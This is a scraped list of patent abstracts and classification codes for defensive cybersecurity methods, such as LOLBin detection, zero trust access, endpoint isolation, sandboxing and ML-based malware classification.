Various modifications to a zero trust network access system facilitate distributed and/or cloud-based deployments of zero trust network access applications and related services, as well as remote management of network security for an enterprise that is hosting the zero trust network access applications.
In example embodiments, techniques are provided to detect LOLBin attacks using a trained machine learning model that classifies command lines as benign or malicious. The machine learning model may be trained using a dataset of command line data that describes executed binary executable files, sourced from the log of events of compute instances. The dataset may be sampled using an approximate content-based logarithmic sampling algorithm (e.g., an algorithm that employs logarithmic sampling based on a locality sensitive hash, for example, a MinHash). The dataset may be labeled and featurized. The featurized labeled dataset may be used to train the machine learning model, which is then deployed to detect LOLBin attacks on a compute instance. In response to detection of a LOLBin attack, a remedial action may be performed on the compute instance.
Methods and systems are described for developing a malicious content detector to identify new malicious text content, such as phishing messages, malicious documents, and/or malicious web content. A computing device is used to generate input data which contains an instruction, examples of content, and content to be analyzed. The examples include malicious and benign content samples, designed to recognize similar malicious content. The computing device feeds this input into a generative language model, which produces text labels that indicate the maliciousness of the content to be analyzed. The methods and systems enable rapid development of security protection by leveraging a small number of malicious samples, instead of training with a large dataset of new training samples.
Systems and methods for assigning a persistent internet protocol (IP) address to a virtual private network (VPN) client. The method includes receiving, at a first server, a request for access from a first VPN client, the request including access credentials and the first server having a routing table; sending, from the first server, the access credentials to an access server; receiving, from the access server at the first server, a first static IP address to be assigned to the first VPN client, wherein the first static IP address is selected from a plurality of available static IP addresses; assigning the first static IP address to the first VPN client; and adding the first static IP address to a static routing path in the routing table, the static routing path specifying an interface to which traffic associated with the first VPN client is to be routed. The static routing path is configured to be referenced to enable traffic associated with the first VPN client to be directed through the interface.
H04L 61/503 - Internet protocol [IP] addresses using an authentication, authorisation and accounting [AAA] protocol, e.g. remote authentication dial-in user service [RADIUS] or Diameter
A potentially malicious command including a plurality of features is received. Additionally, a plurality of nodes included in a decision tree are traversed, based on the plurality of features, to identify a leaf node included in the plurality of nodes. The leaf node is associated with (1) a first set of similar commands, each similar command from the first set of similar commands including the plurality of features, and (2) a second set of similar commands from the first set of similar commands and that were previously detected. Additionally, a probability that the potentially malicious command will be escalated as potentially malicious is determined based on the first set of similar commands and the second set of similar commands. Additionally, a first indication quantifying the first set of similar commands, a second indication quantifying the second set of similar commands, and the probability are caused to be displayed.
A method for prioritizing security events comprises receiving a security event that includes security event data having been generated by an endpoint agent based on a detected activity, wherein the security event data includes one or more features; applying a first computing model to the security event data to automatically determine which of the one or more features are one or more input features to a machine learning system; applying a second computing model to historical data related to the security event data to determine time pattern information of the security event data as an input to the machine learning system; combining the one or more input features from the first computing model and the input from the second computing model to generate a computed feature result; and generating an updated security level value of the security event from the computed feature result.
A method comprises monitoring a computing environment including a plurality of containers, determining, for one of the containers, a service type and an IP address, assigning the IP address of the container having the determined service type to a first list of IP addresses, assigning an IP address of each of the containers to a second list of IP addresses, applying a first security policy for a first source of network traffic for processing by the container having the determined service type and the IP address assigned to the first list of IP addresses, and applying a second security policy for a second source of network traffic for processing by the containers having the IP addresses assigned to the second list of IP addresses.
A method includes receiving, by a computer system, information related to device health of an electronic device, determining, by the computer system, a health status of the electronic device based at least in part on the received information related to the device health of the electronic device, requesting, by a switch having a port connected to the electronic device, the health status of the electronic device from the computer system, receiving, by the computer system, the request for the health status of the electronic device from the switch, transmitting, by the computer system, the health status of the electronic device to the switch, evaluating, by the switch, the transmitted health status of the electronic device using network access rules associated corresponding to health statuses, and applying, by the switch, a network access control configuration to the port of the switch based on the evaluating the transmitted health status.
Methods and systems for detecting threats using threat signatures loaded in a computing device. The methods include receiving a first plurality of threat signatures at a computing device, at least one threat signature of the first plurality of threat signatures having been assigned a score based on at least one metadata attribute having been added to the at least one threat signature; receiving a selection of a second plurality of threat signatures from the first plurality of threat signatures to load into random access memory (RAM) of the computing device, wherein at least one threat signature of the selected plurality of threat signatures is selected based on its assigned score; scanning network traffic accessible by the computing device using the at least one threat signature of the selected plurality of threat signatures; detecting a threat in the network traffic based on the scanning using the at least one threat signature of the selected plurality of threat signatures; and performing a remedial action upon detecting the threat in the network traffic.
In some embodiments, a processor receives, via an interface, natural language data associated with a user request for performing an identified computational task associated with a cybersecurity management system. The processor is configured to provide the natural language data as input to a machine learning (ML) model. The ML model is configured to automatically infer a template query based on the natural language data. The processor is further configured to cause the template query to be displayed, via the interface. The processor is further configured to receive, via the interface, user input indicating a finalized query associated with the identified computational task, and to provide the finalized query as input to a system configured to perform the identified computational task. The processor is further configured to modify a security setting in the cybersecurity management system based on the performance of the identified computational task.
A computer-implemented method includes training a machine-learning model, using a training dataset that distinguishes between critical systems and non-critical systems, to classify a particular computer system as critical or non-critical, wherein a label is applied to the particular computer system during the training that identifies the particular computer system as critical or non-critical, and wherein parameters that describe the critical systems or non-critical systems are used as features during the training. The method further includes receiving an input dataset that describes a plurality of computer systems in the enterprise environment. The method further includes outputting, using the trained machine-learning model, an identification of one or more critical systems of the plurality of computer systems within the enterprise environment and an identification of one or more non-critical systems of the plurality of computer systems within the enterprise environment, wherein each identification is associated with a confidence level.
G06F 21/57 - Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
A Transport Layer Security (TLS) handshake can be terminated early-ie., before certificate validation-to reduce server-side demand, which can be particularly advantageous in counteracting Denial-of-Service (DOS) attacks and the like. To this end, an endpoint may provide a one-time password (OTP) in the client hello message during the initial steps of a TLS handshake or similar connection protocol. A gateway, upon receiving the client hello message, may generate its own OTP for comparison with the OTP in the client hello message. The endpoint and gateway may advantageously generate the OTP based on a secret provided by a threat management facility with a preexisting secure connection to the two entities. If the OTP provided in the client hello message and the OTP generated on the gateway are the same, then the TLS handshake may continue; otherwise, the Transmission Control Protocol (TCP) connection will be terminated by the gateway.
Various modifications to a distributed platform such as a zero trust network access system facilitate greater ease of deployment and administration, while also promoting ease of use and a more seamless user experience at endpoints when accessing remotely managed application resources over a network.
A platform for network threat investigation is augmented with data from cloud resources such as third-party, cloud-based application platforms. The resulting merged data set can be incrementally updated, and used to automatically launch investigations at appropriate times.
Embodiments disclosed include methods and apparatus for detecting a reputation of infrastructure associated with potentially malicious content. In some embodiments, an apparatus includes a memory and a processor. The processor is configured to identify an Internet Protocol (IP) address associated with potentially malicious content and define each row of a matrix by applying a different subnet mask from a plurality of subnet masks to a binary representation of the IP address to define that row of the matrix. The processor is further configured to provide the matrix as an input to a machine learning model, and receive, from the machine learning model, a score associated with a maliciousness of the IP address.
Secrets such as secure session cookies for a web browser can be protected on a compute instance with multiple layers of encryption, such as by encrypting key material that in turn controls cryptographic access to the secret. A compute instance can be instrumented to detect when a process attempts to decrypt this key material so that the process requesting decryption can be compared to authorized or legitimate users of the secret.
A rule generator can automatically generate a machine-leaming-powered detection system capable of recognizing a new malicious object or family of malicious objects and deployable as a text-based, pastable detection rule. The text may be quickly distributed and integrated into existing cybersecurity infrastructure, for example, if the cybersecurity infrastructure supports a rules engine. After initial distribution, the identity may be refined, updated, and replaced. This allows for rapid development and distribution of an initial level of protection, and for updating and improvement over time.
When security-related behavior is detected on an endpoint (1902) through a local security agent (1904) executing on the endpoint, a threat management facility (1908) associated with the endpoint can interact with a user via a second local security agent (19041) on a second endpoint (19021) in order to solicit verification, authorization, authentication or the like related to the behavior. In one aspect, an administrator for an enterprise managed by the threat management facility may verify, authorize, or otherwise approve the detected behavior using this technique. In another aspect, a user of the device may use this infrastructure to approve of a potentially risky behavior on one device by using a verification procedure on a second device associated with the user.
Where a single networked security service supports multiple enterprises, this security service can operate as a shared source of trust so that security devices associated with one enterprise can provide authenticated, policy-based management of computing devices associated with another enterprise. For example, an enterprise firewall can advantageously manage network access for a new device based on a shared and authenticated relationship with the networked security service.
A system for conducting a security recognition task, the system comprising a memory configured to store a model and training data including auxiliary information that will not be available as input to the model when the model is used as a security recognition task model for the security recognition task. The system further comprising one or more processors communicably linked to the memory and comprising a training unit and a prediction unit. The training unit is configured to receive the training data and the model from the memory and subsequently provide the training data to the model, and train the model, as the security recognition task model, using the training data to predict the auxiliary information as well as to perform the security recognition task, thereby improving performance of the security recognition task. The prediction unit is configured to use the security recognition task model output to perform the security recognition task while ignoring the auxiliary attributes in the model output.
In some embodiments, an apparatus includes a memory and a processor. The processor can further be configured to extract a set of scripts from potentially malicious a file. The processor can further be configured to concatenate a representation of each script from the set of scripts with a representation of the remaining scripts from the set of scripts to define a script string. The processor can further be configured to define a feature vector based on the set of n-gram representations of the script string for input of the feature vector to a neural network for output. The processor can further be configured to identify, based on the output from the neural network, a maliciousness classification of the file.
A code segment executing on a compute instance may be identified as suspicious based on runtime behavior or similar behavioral analysis or the like. In order to ensure the identification and use of the most up-to-date identification and remediation tools, the compute instance may defer various remediation steps for an interval, during which the compute instance may wait for data updates from a threat management system. After the interval has passed, the compute instance may use any updated data or tools in order to address the code segment that triggered the initial malware detection.
A honeypot file is cryptographically secured with a cryptographic key. The key, or related key material, is then placed on a central key store and the file is placed on a data store within the enterprise network. Unauthorized access to the honeypot file can then be detecting by monitoring use of the associated key material, which usefully facilitates detection of file access at any time when, and from any location where, cryptographic access to the file is initiated.
In a threat management platform, a number of endpoints log events in an event data recorder. A local agent filters this data and feeds a filtered data stream to a central threat management facility. The central threat management facility can locally or globally tune filtering by local agents based on the current data stream, and can query local event data recorders for additional information where necessary or helpful in threat detection or forensic analysis. The central threat management facility also stores and deploys a number of security tools such as a web-based user interface supported by machine learning models to identify potential threats requiring human intervention and other models to provide human-readable context for evaluating potential threats.
In some embodiments, an apparatus includes a memory and a processor. The processor can be configured to train a machine-learning(ML)model to output an identification of whether an artifact is malicious and (2) a confidence value associated with the identification of whether the artifact is malicious. The processor can further be configured to receive a set of artifacts during a set of time periods, and provide a representation of each artifact from the set of artifacts to obtain as an output of the MLmodel including an indication of whether that artifact is malicious and a confidence value associated with the indication. The processor can be further configured to calculate a confidence metric for each time period based on the confidence value associated with each artifact, and send an indication to retrain the MLmodel based on the confidence metric for at least one time period meeting a retraining criterion.
A variety of techniques are employed to locally secure endpoints in the context of an enterprise network and remote network resources. For example, a threat management facility that remotely stores global reputation information for network content can be used in combination with a recognition engine such as a machine learning classifier that is locally deployed on endpoints within an enterprise network. Additionally, or alternatively, a security agent conditionally hooks a process for malware monitoring based on a persistent hook state for the process that may be stored, for example, in a process cache. When a process launches in a backoff state indicating that the process previously crashed after hooking, the security agent may further conditionally hook the process based on a reputation of the process or any other relevant contextual information.
H04L 29/06 - Communication control; Communication processing characterised by a protocol
G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
G06F 21/53 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity, buffer overflow or preventing unwanted data erasure by executing in a restricted environment, e.g. sandbox or secure virtual machine
A security platform that iteratively adapts to a changing security environment by creating and updating entity models based on observed activities and detecting patterns of events that deviate from these entity models.
Endpoints within a subnet of a heterogeneous network are configured to cooperatively respond to internal or external notifications of compromise in order to protect the endpoints within the subnet and throughout the enterprise network. For example, each endpoint may be configured to self-isolate when a local security agent detects a compromise, and to shun one of the other endpoints in response to a corresponding notification of compromise in order to prevent the other, compromised endpoint from communicating with other endpoints and further compromising other endpoints either within the subnet or throughout the enterprise network.
In some embodiments, a method includes providing an indication of a first file having a first characteristic to a neural network and receiving a classification associated with the first file from the neural network. The method includes providing an indication of a second file having a second characteristic to the neural network and receiving a classification associated with the second file from the neural network. The method further includes calculating a shared importance value for each node from a set of nodes in the neural network. The shared importance value indicates an amount to which that node is used to produce both the classification associated with the first file and the classification associated with the second file. The method further includes modifying the neural network based on the shared importance for at least one node from the set of nodes.
In a virtualized environment where multiple guest virtual machines receive security services from multiple security virtual machines, a guest virtual machine automatically transitions to a new virtual security machine under various conditions. For example, the guest virtual machine may select a new security virtual machine when connectivity to the current security virtual machine degrades below a predetermined threshold, or in response to a request from the current security virtual machine indicating, e.g., that the current security virtual machine is about to shut down or otherwise terminate security services to the guest virtual machine.
A threat management facility generates a simulated phishing threat based on one or more characteristics of users of an enterprise network and transmits the simulated phishing threat to the users of the enterprise network. Based on whether a user fails to respond appropriately to the simulated phishing threat, the threat management facility may adjust a profile of the user. Network traffic to and from an endpoint associated with the user may be processed according to the adjusted profile.
In other embodiments, a non-transitory processor-readable medium stores code representing instructions to be executed by a processor. The code includes code to cause the processor to receive a structured file for which a machine learning model has made a malicious content classification. The code further includes code to remove a portion of the structured file to define a modified structured file that follows a format associated with a type of the structured file. The code further includes code to extract a set of features from the modified structured file. The code further includes code to provide the set of features as an input to the machine learning model to produce an output. The code further includes code to identify an impact of the portion of the structured file on the malicious content classification of the structured file based on the output.
A threat management facility detects a device on an enterprise network and determines whether the device is one of a set of managed devices for the enterprise network. When the device is not one of the set of managed devices, the threat management facility may selectively direct the device to a portal that manages admission of unrecognized devices onto the enterprise network. As the user interacts with the portal or based on a response of the unrecognized device to the portal, the portal may manage admission of unrecognized devices onto the enterprise network while making efficient use of network administrator resources.
An apparatus for detecting malicious files includes a memory and a processor communicatively coupled to the memory. The processor receives multiple potentially malicious files. A first potentially malicious file has a first file format, and a second potentially- malicious file has a second file format different than the first file format. The processor extracts a first set of strings from the first potentially malicious file, and extracts a second set of strings from the second potentially malicious file. First and second feature vectors are defined based on lengths of each string from the associated set of strings. The processor provides the first feature vector as an input to a machine learning model to produce a maliciousness classification of the first potentially malicious file, and provides the second feature vector as an input to the machine learning model to produce a maliciousness classification of the second potentially malicious file.
Synthetic training sets for machine learning are created by identifying and modifying functional features of code in an existing malware training set. By filtering the resulting synthetic code to measure malware impact and novelty, training sets can be created that predict novel malware and to seek to preemptively exhaust the space of new malware. These synthesized training sets can be used in turn to improve training of machine learning models. Furthermore, by repeating the process of new code generation, filtering and training, an iterative machine learning process may be created that continuously narrows the window of vulnerabilities to new malicious actions.
Electronic communications passing through a communication gateway or similar device for an enterprise can be monitored for indicators of malicious activity. When potentially malicious activity is identified, a user-based inquiry can be employed to identify potential sources of the malicious activity within the enterprise network. More specifically, by identifying a user that sourced the communication, instead of or in addition to a network address, devices within the enterprise network associated with the user can be located, analyzed, and remediated as appropriate.
Implementations generally relate methods, systems, and computer readable media for providing automatic access point registration. In some implementations, a method includes receiving an indication of automatic device onboarding activation. The method further includes receiving a selection of one or more reference devices. The method further includes determining one or more detectable devices of the one or more candidate devices to be onboarded that are detectable by at least one of the one or more reference devices. The method further includes obtaining one or more automatic configuration parameters from one or more of the reference devices. The method further includes configuring one or more of the detectable devices to be onboarded with the one or more automatic configuration parameters.
An enterprise security system is improved by managing network flows based on an application type. When a network message having an unknown application type is received at a gateway, firewall, or other network device/service from an endpoint, the endpoint that originated the network message may be queried for identifying information for the source of the network message and the application type may be determined, or the endpoint may periodically communicate application type information to the network device in a heartbeat or other periodic communication or the like. The network message may be managed along with other network traffic according to the application type. In another aspect, an endpoint can protect computing objects on the endpoint against tampering with a secure cache in the kernel space of the endpoint operating system.
An event handler implements a state machine or similar construct for processing of complex event chains as incremental events are detected. This approach advantageously limits processing to monitoring for and responding to a next event in a sequence of events, and supports complex event detection in a manner that scales efficiently in time and computation.
Implementations generally relate methods, systems, and computer readable media for providing threat index based wireless local area networks (WLAN) security and quality of service. In one implementation, a method includes receiving a request from a client device connected to a network via a network link. The method further includes determining a threat index value for the client device. The method further includes determining one or more security policies associated with one or more respective network resources, where each security policy applies one or more rules for allocating one of the network resources. The method further includes determining allocation of one or more of the network resources to the client device based on the one or more security policies and the threat index value.
Methods, systems and computer readable media for protecting networks and devices from network security attack using physical communication layer characteristics are described.
Attachments or other documents can be transmitted to a sandbox environment where they can be concurrently opened for remote preview from an endpoint and scanned for possible malware. A gateway or other intermediate network element may enforce this process by replacing attachments, e.g., in incoming electronic mail communications, with links to a document preview hosted in the sandbox environment.
G06F 21/51 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems at application loading time, e.g. accepting, rejecting, starting or inhibiting executable software based on integrity or source reliability
G06F 21/53 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity, buffer overflow or preventing unwanted data erasure by executing in a restricted environment, e.g. sandbox or secure virtual machine
G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
44.
PROACTIVE NETWORK SECURITY USING A HEALTH HEARTBEAT
An endpoint in a network periodically generates a heartbeat encoding health state information and transmits this heartbeat to other network entities. Recipients of the heartbeat may use the health state information to independently make decisions about communications with the source endpoint, for example, by isolating the endpoint to prevent further communications with other devices sharing the network with the endpoint. Isolation may be coordinated by a firewall or gateway for the network, or independently by other endpoints that receive a notification of the compromised health state.
An endpoint in an enterprise network is monitored, and when a potential trigger for a distributed denial of service (DDoS) attack is followed by an increase in network traffic from the endpoint to a high reputation network address, the endpoint is treated as a DDoS service bot and isolated from the network until remediation can be performed.
G06F 15/16 - Combinations of two or more digital computers each having at least an arithmetic unit, a program unit and a register, e.g. for a simultaneous processing of several programs
G06F 21/00 - Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
H04L 9/32 - Arrangements for secret or secure communications; Network security protocols including means for verifying the identity or authority of a user of the system
H04L 12/24 - Arrangements for maintenance or administration
A data recorder stores endpoint activity on an ongoing basis as sequences of events that causally relate computer objects such as processes and files. When a security event is detected, an event graph may be generated based on these causal relationships among the computing objects. For a root cause analysis, the event graph may be traversed in a reverse order from the point of an identified security event (e.g., a malware detection event) to preceding computing objects, while applying one or more cause identification rules to identify a root cause of the security event. Once a root cause is identified, the event graph may be traversed forward from the root cause to identify other computing objects that are potentially compromised by the root cause. Further, patterns within the event graph can be used to detect the presence of malware on the endpoint.
A portable encryption format wraps encrypted files in a self-executing container that facilitates transparent, identity-based decryption for properly authenticated users while also providing local password access to wrapped files when identity-based decryption is not available.
Static analysis is applied to unrecognized software objects in order to identify and address potential anti-sandboxing techniques. Where static analysis suggests the presence of any such corresponding code, the software object may be forwarded to a sandbox for further analysis. In another aspect, multiple types of sandboxes may be provided, with the type being selected according to the type of exploit suggested by the static analysis.
G06F 21/53 - Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity, buffer overflow or preventing unwanted data erasure by executing in a restricted environment, e.g. sandbox or secure virtual machine
G06F 21/56 - Computer malware detection or handling, e.g. anti-virus arrangements
49.
MONITORING VARIATIONS IN OBSERVABLE EVENTS FOR THREAT DETECTION
Threat detection is improved by monitoring variations in observable events and correlating these variations to malicious activity. The disclosed techniques can be usefully employed with any attribute or other metric that can be instrumented on an endpoint and tracked over time including observable events such as changes to files, data, software configurations, operating systems, and so forth. Correlations may be based on historical data for a particular machine, or a group of machines such as similarly configured endpoints. Similar inferences of malicious activity can be based on the nature of a variation, including specific patterns of variation known to be associated with malware and any other unexpected patterns that deviate from normal behavior. Embodiments described herein use variations in, e.g., server software updates or URL cache hits on an endpoint, but the techniques are more generally applicable to any endpoint attribute that varies in a manner correlated with malicious activity.
Disclosed are various embodiments of method and system for network access control. The method may involve traffic monitoring and vulnerability detection using process information. The system may analyze the vulnerability as a process malfunctioning where preventive action focuses on process blocking as opposed to host blocking, which can lead to improved performance and productivity of a network. Techniques may use process related information, connection information, and network packet information for network control. The information may be matched against a plurality of signatures to identify and detect a known vulnerability in network activities. On the basis of a match, a verification report may be established. Techniques may further check whether a verification report is applicable to a process associated with a network packet and allow or block the process running on the host based in the report.
PG446383WO Page 127of 127 LABELING COMPUTING OBJECTS FOR IMPROVED THREAT DETECTION ABSTRACT Threat detection instrumentation is simplified by providing and updating labels for computing objects in a context-sensitive manner. This may include simple labeling schemes to distinguish between objects, e.g., trusted/untrusted processes or corporate/private data. This may also include more granular labeling schemes such as a three-tiered scheme that identifies a category (e.g., financial, e-mail, game), static threat detection attributes (e.g., signatures, hashes, API calls), and explicit identification (e.g., what a file or process calls itself). By tracking such data for various computing objects and correlating these labels to malware occurrences, rules can be written for distribution to endpoints to facilitate threat detection based on, e.g., interactions of labeled objects, changes to object labels, and soforth. In this manner, threat detection based on complex interactions of computing objects can be characterized in a platform independent manner and pre-processed on endpoints without requiring significant communications overhead with a remote threat management facility.
patents
